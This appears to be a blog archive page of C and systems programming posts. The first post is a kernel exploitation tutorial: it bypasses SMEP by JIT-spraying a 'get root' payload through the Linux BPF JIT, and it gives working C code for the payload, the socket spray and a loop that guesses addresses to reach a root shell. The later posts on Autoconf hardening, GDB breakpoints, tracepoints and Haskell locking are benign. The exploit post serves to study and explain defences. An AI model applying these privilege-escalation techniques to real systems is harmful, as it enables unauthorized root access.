Showing posts with label c. Show all posts
Showing posts with label c. Show all posts

Saturday, November 17, 2012

Attacking hardened Linux systems with kernel JIT spraying

Intel's new Ivy Bridge CPUs support a security feature called Supervisor Mode Execution Protection (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are many ways to bypass SMEP.

This article demonstrates one particularly fun approach. Since the Linux kernel implements a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if RLIMIT_NOFILE is set as low as 11.

If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is available on GitHub too.

Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.

Kernel exploitation and SMEP

The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.

In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!

But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent unintended execution of userspace code, as in a kernel exploit.)

So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with no-execute data, and the same techniques apply.

If you haven't seen some kernel exploits before, you might want to check out the talk I gave, or the many references linked from those slides.

JIT spraying

JIT spraying [PDF] is a viable tactic when we (the attacker) control the input to a just-in-time compiler. The JIT will write into executable memory on our behalf, and we have some control over what it writes.

Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:

x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...

(Here XXYYZZ and PPQQRR stand for arbitrary three-byte quantities.) The JIT might decide to put variable x in the %eax machine register, and produce x86 code like this:

machine code      assembly (AT&T syntax)

b8 ZZ YY XX a8    mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8    mov $0xa8PPQQRR, %eax
b8 ...

Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like

ZZ YY XX          (payload instruction)
a8 b8             test $0xb8, %al
RR QQ PP          (payload instruction)
a8 b8             test $0xb8, %al
...

We control those bytes ZZ YY XX and RR QQ PP. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.

Attacking the BPF JIT

Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors1. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth2 of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

// Create a socket with our BPF program attached.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

  • SMEP is not widely deployed yet.
  • The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements3 in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...


  1. Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.

  2. While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.

  3. On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.

Sunday, May 13, 2012

Automatic binary hardening with Autoconf

How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.

Operating systems now support a variety of tricks to make life difficult for would-be attackers. But most of these hardening features need to be enabled at compile time. When I started contributing to Mosh, I made it a goal to build with full hardening on every platform, not just proactive distributions like Ubuntu. This means detecting available hardening features at compile time.

Mosh uses Autotools, so this code is naturally part of the Autoconf script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.

I've published an example project which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I waive all copyright and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the m4/ subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.

This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.

How it works

The basic idea is simple. We use AX_CHECK_{COMPILE,LINK}_FLAG from the Autoconf Archive to detect support for each feature. The syntax is

AX_CHECK_COMPILE_FLAG(flag, action-if-supported, action-if-unsupported, extra-flags)

For extra-flags we generally pass -Werror so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the action-if-supported and action-if-unsupported blocks. You can see the full story in configure.ac.

We accumulate all the supported flags into HARDEN_{C,LD}FLAGS and substitute these into each Makefile.am. The hardening flags take effect even if the user overrides CFLAGS on the command line. To explicitly disable hardening, pass

./configure --disable-hardening

A useful command when testing is

grep HARDEN config.log

Complications

Clang will not error out on unrecognized flags, even with -Werror. Instead it prints a message like

clang: warning: argument unused during compilation: '-foo'

and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script wrap-compiler-for-flag-check runs a command and errors out if the command prints a line containing "warning: argument unused". Then configure temporarily sets

CC="$srcdir/scripts/wrap-compiler-for-flag-check $CC"

while performing the flag checks.

When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags conflict with ours. For example we set -Wstack-protector, meaning "warn about any unprotected functions", and they set --param=ssp-buffer-size=4, meaning "don't protect functions with fewer than 4 bytes of buffers". Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to debian/rules:

export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector
-include /usr/share/dpkg/buildflags.mk

We did something similar for Fedora.

Yet another problem is that Debian distributes skalibs (a Mosh dependency) as a static-only library, built without -fPIC, which in turn prevents Mosh from using -fPIC. Mosh can build the relevant parts of skalibs internally, but Debian and Ubuntu don't want us doing that. The unfortunate solution is simply to reimplement the small amount of skalibs we were using on Linux.

The flags

Here are the specific protections I enabled.

  • -D_FORTIFY_SOURCE=2 enables some compile-time and run-time checks on memory and string manipulation. This requires -O1 or higher. See also man 7 feature_test_macros.

  • -fno-strict-overflow prevents GCC from optimizing away arithmetic overflow tests.

  • -fstack-protector-all detects stack buffer overflows after they occur, using a stack canary. We also set -Wstack-protector (warn about unprotected functions) and --param ssp-buffer-size=1 (protect regardless of buffer size). (Actually, the "-all" part of -fstack-protector-all might imply ssp-buffer-size=1.)

  • Attackers can use fragments of legitimate code already in memory to stitch together exploits. This is much harder if they don't know where any of that code is located. Shared libraries get random addresses by default, but your program doesn't. Even an exploit against a shared library can take advantage of that. So we build a position independent executable (PIE), with the goal that every executable page has a randomized address.

  • Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the dynamic loader needs to perform relocations there. The GNU linker flag -z relro arranges to set them as read-only once the dynamic loader is done with them.

    In particular, this can protect the PLT and GOT, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set -z now to resolve PLT entries at startup so they get RELRO protection.

In the example project I also enabled -Wall -Wextra -Werror. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project -Wall-clean, you can at least add security-relevant checks such as -Wformat-security.

Demonstration

On x86 Linux, we can check the hardening features using Tobias Klein's checksec.sh. First, as a control, let's build with no hardening.

$ ./build.sh --disable-hardening
+ autoreconf -fi
+ ./configure --disable-hardening
...
+ make
...
$ ~/checksec.sh --file src/test
No RELRO       No canary found  NX enabled  No PIE

The no-execute bit (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:

$ ./build.sh
+ autoreconf -fi
+ ./configure
...
checking whether C compiler accepts -fno-strict-overflow... yes
checking whether C++ compiler accepts -fno-strict-overflow... yes
checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C compiler accepts -fstack-protector-all... yes
checking whether C++ compiler accepts -fstack-protector-all... yes
checking whether the linker accepts -fstack-protector-all... yes
checking whether C compiler accepts -Wstack-protector... yes
checking whether C++ compiler accepts -Wstack-protector... yes
checking whether C compiler accepts --param ssp-buffer-size=1... yes
checking whether C++ compiler accepts --param ssp-buffer-size=1... yes
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... yes
checking whether the linker accepts -Wl,-z,relro... yes
checking whether the linker accepts -Wl,-z,now... yes
...
+ make
...
$ ~/checksec.sh --file src/test
Full RELRO     Canary found     NX enabled  PIE enabled

We can dig deeper on some of these. objdump -d shows that the unhardened executable puts main at a fixed address, say 0x4006e0, while the position-independent executable specifies a small offset like 0x9e0. We can also see the stack-canary checks:

b80:  sub   $0x18,%rsp
b84:  mov   %fs:0x28,%rax
b8d:  mov   %rax,0x8(%rsp)

      ... function body ...

b94:  mov   0x8(%rsp),%rax
b99:  xor   %fs:0x28,%rax
ba2:  jne   bb4 <c_fun+0x34>

      ... normal epilogue ...

bb4:  callq 9c0 <__stack_chk_fail@plt>

The function starts by copying a "canary" value from %fs:0x28 to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.

The canary is chosen randomly by glibc at program start. The %fs segment has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).

The hardening flags adapt to any other compiler options we specify. For example, let's try a static build:

$ ./build.sh LDFLAGS=-static
+ autoreconf -fi
+ ./configure LDFLAGS=-static
...
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... no
...
+ make
...
$ file src/test
src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, for GNU/Linux 2.6.26, not stripped
$ ~/checksec.sh --file src/test
Partial RELRO  Canary found     NX enabled  No PIE

We can't have position independence with static linking. And checksec.sh thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.

Performance

So what's the catch? These protections can slow down your program significantly. I ran a few benchmarks for Mosh, on three test machines:

  • A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 i386

  • A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid amd64

  • A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid amd64

In all three cases I built Mosh using GCC 4.6.3. Here's the relative slowdown, in percent.

Protections Netbook Laptop Desktop
Everything 16.0 4.4 2.1
All except PIE 4.7 3.3 2.2
All except stack protector 11.0 1.0 1.1

PIE really hurts on i386 because data references use an extra register, and registers are scarce to begin with. It's much cheaper on amd64 thanks to PC-relative addressing.

There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.

Thursday, January 19, 2012

Embedding GDB breakpoints in C source code

Have you ever wanted to embed GDB breakpoints in C source code?

int main() {
printf("Hello,\n");
EMBED_BREAKPOINT;
printf("world!\n");
EMBED_BREAKPOINT;
return 0;
}

One way is to directly insert your CPU's breakpoint instruction. On x86:

#define EMBED_BREAKPOINT  asm volatile ("int3;")

There are at least two problems with this approach:

  • They aren't real GDB breakpoints. You can't disable them, count how many times they've been hit, etc.

  • If you run the program outside GDB, the breakpoint instruction will crash your process.

Here is a small hack which solves both problems:

#define EMBED_BREAKPOINT \
    asm("0:"                              \
        ".pushsection embed-breakpoints;" \
        ".quad 0b;"                       \
        ".popsection;")

We place a local label into the instruction stream, and then save its address in the embed-breakpoints linker section.

Then we need to convert these addresses into GDB breakpoint commands. I wrote a tool that does this, as a wrapper for the gdb command. Here's how it works, on our initial example:

$ gcc -g -o example example.c

$ ./gdb-with-breakpoints ./example
Reading symbols from example...done.
Breakpoint 1 at 0x4004f2: file example.c, line 8.
Breakpoint 2 at 0x4004fc: file example.c, line 10.
(gdb) run
Starting program: example 
Hello,

Breakpoint 1, main () at example.c:8
8           printf("world!\n");
(gdb) info breakpoints
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0x00000000004004f2 in main at example.c:8
        breakpoint already hit 1 time
2       breakpoint     keep y   0x00000000004004fc in main at example.c:10

If we run the program normally, or in GDB without the wrapper, the EMBED_BREAKPOINT statements do nothing. The breakpoint addresses aren't even loaded into memory, because the embed-breakpoints section is not marked as allocatable.

You can find all of the code on GitHub under a BSD license. I've done only minimal testing, but I hope it will be a useful debugging tool for someone. Let me know if you find any bugs or improvements. You can comment here, or find my email address on GitHub.

I'm not sure about the decision to write the GDB wrapper in C using BFD. I also considered Haskell and elf, or Python and the new pyelftools. One can probably do something nicer using the GDB Python API, which was added a few years ago.

This code depends on a GNU toolchain: it uses GNU C extensions, GNU assembler syntax, and BFD. The GDB wrapper uses the Linux proc filesystem, so that it can pass to GDB a temporary file which has already been unlinked. You could port it to other UNIX systems by changing the tempfile handling. It should work on a variety of CPU architectures, but I've only tested it on 32- and 64-bit x86.

Monday, November 7, 2011

Self-modifying code for debug tracing in quasi-C

Printing a program's state as it runs is the simple but effective debugging tool of programmers everywhere. For efficiency, we usually disable the most verbose output in production. But sometimes you need to diagnose a problem in a deployed system. It would be convenient to declare "tracepoints" and enable them at runtime, like so:

tracepoint foo_entry;

int foo(int n) {
TRACE(foo_entry, "called foo(%d)\n", n);
// ...
}

// Called from UI, monitoring interface, etc.
void debug_foo() {
enable(&foo_entry);
}

Here's a simple implementation of this API:

typedef int tracepoint;

#define TRACE(_point, _args...) \ do { \ if (_point) printf(_args); \ } while (0)

static inline void enable(tracepoint *point) {
*point = 1;
}

Each tracepoint is simply a global variable. The construct do { ... } while (0) is a standard trick to make macro-expanded code play nicely with its surroundings. We also use GCC's syntax for macros with a variable number of arguments.

This approach does introduce a bit of overhead. One concern is that reading a global variable will cause a cache miss and will also evict a line of useful data from the cache. There's also some impact from adding a branch instruction. We'll develop a significantly more complicated implementation which avoids both of these problems.

Our new solution will be specific to x86-64 processors running Linux, though the idea can be ported to other platforms. This approach is inspired by various self-modifying-code schemes in the Linux kernel, such as ftrace, kprobes, immediate values, etc. It's mostly intended as an example of how these tricks work. The code in this article is not production-ready.

The design

Our new TRACE macro will produce code like the following pseudo-assembly:

foo:
...
; code before tracepoint
...
tracepoint:
nop
after_tracepoint:
...
; rest of function
...
ret

do_tracepoint:
push args to printf
call printf
jmp after_tracepoint

In the common case, the tracepoint is disabled, and the overhead is only a single nop instruction. To enable the tracepoint, we replace the nop instruction in memory with jmp do_tracepoint.

The TRACE macro

Our nop instruction needs to be big enough that we can overwrite it with an unconditional jump. On x86-64, the standard jmp instruction has a 1-byte opcode and a 4-byte signed relative displacement, so we need a 5-byte nop. Five one-byte 0x90 instructions would work, but a single five-byte instruction will consume fewer CPU resources. Finding the best way to do nothing is actually rather difficult, but the Linux kernel has already compiled a list of favorite nops. We'll use this one:

#define NOP5 ".byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"

Let's check this instruction using udcli:

$ echo 0f 1f 44 00 00 | udcli -x -64 -att
0000000000000000 0f1f440000       nop 0x0(%rax,%rax)

GCC's extended inline assembly lets us insert arbitrarily bizarre assembly code into a normal C program. We'll use the asm goto flavor, new in GCC 4.5, so that we can pass C labels into our assembly code. (The tracing use case inspired the asm goto feature, and my macro is adapted from an example in the GCC manual.)

Here's how it looks:

typedef int tracepoint;

#define TRACE(_point, _args...) \ do { \ asm goto ( \ "0: " NOP5 \ ".pushsection trace_table, \"a\";" \ ".quad " #_point ", 0b, %l0;" \ ".popsection" \ : : : : __lbl_##_point); \ if (0) { \ __lbl_##_point: printf(_args); \ } \ } while (0)

We use the stringify and concat macro operators, and rely on the gluing together of adjacent string literals. A call like this:

TRACE(foo_entry, "called foo(%d)\n", n);

will produce the following code:

  do {
asm goto (
"0: .byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"
".pushsection trace_table, \"a\";"
".quad foo_entry, 0b, %l0;"
".popsection"
: : : : __lbl_foo_entry);
if (0) {
__lbl_foo_entry: printf("called foo(%d)\n", n);
}
} while (0);

Besides emitting the nop instruction, we write three 64-bit values ("quads"). They are, in order:

  • The address of the tracepoint variable declared by the user. We never actually read or write this variable. We're just using its address as a unique key.
  • The address of the nop instruction, by way of a local assembler label.
  • The address of the C label for our printf call, as passed to asm goto.

This is the information we need in order to patch in a jmp at runtime. The .pushsection directive makes the assembler write into the trace_table section without disrupting the normal flow of code and data. The "a" section flag marks these bytes as "allocatable", i.e. something we actually want available at runtime.

We count on GCC's optimizer to notice that the condition 0 is unlikely to be true, and therefore move the if body to the end of the function. It's still considered reachable due to the label passed to asm goto, so it will not fall victim to dead code elimination.

The linker script

We have to collect all of these trace_table records, possibly from multiple source files, and put them somewhere for use by our C code. We'll do this with the following linker script:

SECTIONS {
  trace_table : {
    trace_table_start = .;
    *(trace_table)
    trace_table_end = .;
  }
}

This concatenates all trace_table sections into a single section in the resulting binary. It also provides symbols trace_table_start and trace_table_end at the endpoints of this section.

Memory protection

Linux systems will prevent an application from overwriting its own code, for good security reasons, but we can explicitly override these permissions. Memory permissions are managed per page of memory. There's a correct way to determine the size of a page, but our code is terribly x86-specific anyway, so we'll hardcode the page size of 4096 bytes.

#define PAGE_SIZE 4096
#define PAGE_OF(_addr) ( ((uint64_t) (_addr)) & ~(PAGE_SIZE-1) )

Then we can unprotect an arbitrary region of memory by calling mprotect for the appropriate page(s):

static void unprotect(void *addr, size_t len) {
uint64_t pg1 = PAGE_OF(addr),
pg2 = PAGE_OF(addr + len - 1);
if (mprotect((void *) pg1, pg2 - pg1 + PAGE_SIZE,
PROT_READ | PROT_EXEC | PROT_WRITE)) {
perror("mprotect");
abort();
}
}

We're calling mprotect on a page which was not obtained from mmap. POSIX does not define this behavior, but Linux specifically allows mprotect on any page except the vsyscall page.

Enabling a tracepoint

Now we need to implement the enable function:

void enable(tracepoint *point);

We will scan through the trace_table records looking for a matching tracepoint pointer. The C struct corresponding to a trace_table record is:

struct trace_desc {
tracepoint *point;
void *jump_from;
void *jump_to;
} __attribute__((packed));

The packed attribute tells GCC not to insert any padding within or after these structs. This ensures that their layout will match the records we produced from assembly. Now we can implement a linear search through this table.

void enable(tracepoint *point) {
extern struct trace_desc trace_table_start[], trace_table_end[];
struct trace_desc *desc;
for (desc = trace_table_start; desc < trace_table_end; desc++) {
if (desc->point != point)
continue;

int64_t offset = (desc->jump_to - desc->jump_from) - 5;
if ((offset > INT32_MAX) || (offset < INT32_MIN)) {
fprintf(stderr, "offset too big: %lx\n", offset);
abort();
}

int32_t offset32 = offset;
unsigned char *dest = desc->jump_from;
unprotect(dest, 5);
dest[0] = 0xe9;
memcpy(dest+1, &offset32, 4);
}
}

We enable a tracepoint by overwriting its nop with an unconditional jump. The opcode is 0xe9. The operand is a 32-bit displacement, interpreted relative to the instruction after the jump. desc->jump_from points to the beginning of what will be the jump instruction, so we subtract 5 from the displacement. Then we unprotect memory and write the new bytes into place.

That's everything. You can grab all of this code from GitHub, including a simple test program.

Pitfalls

Where to start?

This code is extremely non-portable, relying on details of x86-64, Linux, and specific recent versions of the GNU C compiler and assembler. The idea can be ported to other platforms, with some care. For example, ARM processors require an instruction cache flush after writing to code. Linux on ARM implements the cacheflush system call for this purpose.

Our code is not thread-safe, either. If one thread reaches a nop while it is being overwritten by another thread, the result will surely be a crash or other horrible bug. The Ksplice paper [PDF] discusses how to prevent this, in the context of live-patching the Linux kernel.

Is it worth opening this can of worms in order to improve performance a little? In general, no. Obviously we'd have to measure the performance difference to be sure. But for most projects, concerns of maintainability and avoiding bugs will preclude tricky hacks like this one.

The Linux kernel is under extreme demands for both performance and flexibility. It's part of every application on a huge number of systems, so any small performance improvement has a large aggregate effect. And those systems are incredibly diverse, making it likely that someone will see a large difference. Finally, kernel development will always involve tricky low-level code as a matter of course. The infrastructure is already there to support it — both software infrastructure and knowledgeable developers.

Friday, November 4, 2011

Global locking through StablePtr

I spoke before of using global locks in Haskell to protect a thread-unsafe C library. And I wrote about a GHC bug which breaks the most straightforward way to get a global lock.

My new solution is to store an MVar lock in a C global variable via StablePtr. I've implemented this, and it seems to work. I'd appreciate if people could bang on this code and report any issues.

You can get the library from Hackage or browse the source, including a test program. You can also use this code as a template for including a similar lock in your own Haskell project.

The C code

On the C side, we declare a global variable and a function to read that variable.

static void* global = 0;

void* hs_globalzmlock_get_global(void) {
return global;
}

To avoid name clashes, I gave this function a long name based on the z-encoding of my package's name. The variable named global will not conflict with another compilation unit, because it's declared static.

Another C function will set this variable, if it was previously 0. Two threads might execute this code concurrently, so we use a GCC built-in for atomic memory access.

int hs_globalzmlock_set_global(void* new_global) {
void* old = __sync_val_compare_and_swap(&global, 0, new_global);
return (old == 0);
}

If old is not 0, then someone has already set global, and our assignment was dropped. We report this condition to the caller.

Foreign imports

On the Haskell side, we import these C functions.

foreign import ccall unsafe "hs_globalzmlock_get_global"
c_get_global :: IO (Ptr ())

foreign import ccall "hs_globalzmlock_set_global"
c_set_global :: Ptr () -> IO CInt

The unsafe import of c_get_global demands justification. This wrinkle arises from the fact that GHC runs many Haskell threads on the same OS thread. A long-running foreign call from that OS thread might block unrelated Haskell code. GHC prevents this by moving the foreign call and/or other Haskell threads to a different OS thread. This adds latency to the foreign call — about 100 nanoseconds in my tests.

In most cases a 100 ns overhead is negligible. But it matters for functions which are guaranteed to return in a very short amount of time. And blocking other Haskell threads during such a short call is fine. Marking the import unsafe tells GHC to ignore the blocking concern, and generate a direct C function call.

Our function c_get_global is a good use case for unsafe, because it simply returns a global variable. In my tests, adding unsafe decreased the overall latency of locking by about 50%. We cannot use unsafe with c_set_global because, in the worst case, GCC implements atomic operations with blocking library functions. That's okay because c_set_global will only be called a few times anyway.

The Haskell code

Now we have access to a C global of type void*, and we want to store a Haskell value of type MVar (). The StablePtr module is just what we need. A StablePtr is a reference to some Haskell expression, which can be converted to Ptr (), aka void*. There is no guarantee about this Ptr () value, except that it can be converted back to the original StablePtr.

Here's how we store an MVar:

set :: IO ()
set = do
mv <- newMVar ()
ptr <- newStablePtr mv
ret <- c_set_global (castStablePtrToPtr ptr)
when (ret == 0) $
freeStablePtr ptr

